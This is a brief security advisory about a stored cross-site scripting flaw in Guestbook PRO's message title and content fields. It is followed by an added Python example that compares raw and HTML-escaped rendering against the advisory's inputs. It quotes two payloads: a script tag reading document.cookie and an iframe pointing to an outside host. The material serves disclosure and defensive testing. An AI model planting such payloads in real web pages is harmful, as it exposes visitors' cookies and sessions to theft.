============================================================
Guestbook PRO is an advanced guestbook for WebApp.
A new vulnerability exists in the title and content of a msg: the characters
entered are not filtered, so HTML code can be injected.
Type in the title or content of msg:
<script>alert(document.cookie)</script>
<iframe src=http://othersite/sb.php>
Contact the Vendor.
http://www.soulblack.com.ar/repo/papers/guesbookpro_advisory.txt
Vulnerability reported by SoulBlack Security Research
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
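
Added example, not part of the original advisory and not Guestbook PRO's own code: it renders a guestbook entry with and without output encoding of the title and content fields, then parses the result to show whether the two strings quoted in the advisory survive as live tags. The template, function names and allowed-tag set are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Hypothetical entry template; the real Guestbook PRO markup is not shown in the advisory.
TEMPLATE = '<div class="entry"><h3>{title}</h3><p>{content}</p></div>'

# The two strings quoted in the advisory, used here as test input.
ADVISORY_INPUTS = [
    "<script>alert(document.cookie)</script>",
    "<iframe src=http://othersite/sb.php>",
]

def render_entry_unsafe(title, content):
    """Behaviour described in the advisory: fields are inserted verbatim."""
    return TEMPLATE.format(title=title, content=content)

def render_entry_safe(title, content):
    """Encode &, <, >, " and ' so user text cannot open a tag or attribute."""
    return TEMPLATE.format(
        title=html.escape(title, quote=True),
        content=html.escape(content, quote=True),
    )

class TagCollector(HTMLParser):
    """Records the name of every start tag found in the markup."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def injected_tags(markup):
    """Return the set of tags in the output that the template does not emit."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    allowed = {"div", "h3", "p"}  # tags the hypothetical template produces itself
    return {t for t in collector.tags if t not in allowed}

if __name__ == "__main__":
    for payload in ADVISORY_INPUTS:
        print("unsafe:", injected_tags(render_entry_unsafe(payload, payload)))
        print("safe:  ", injected_tags(render_entry_safe(payload, payload)))
```

The same parse-and-compare check can be kept as a regression test for any field that is echoed back into a page.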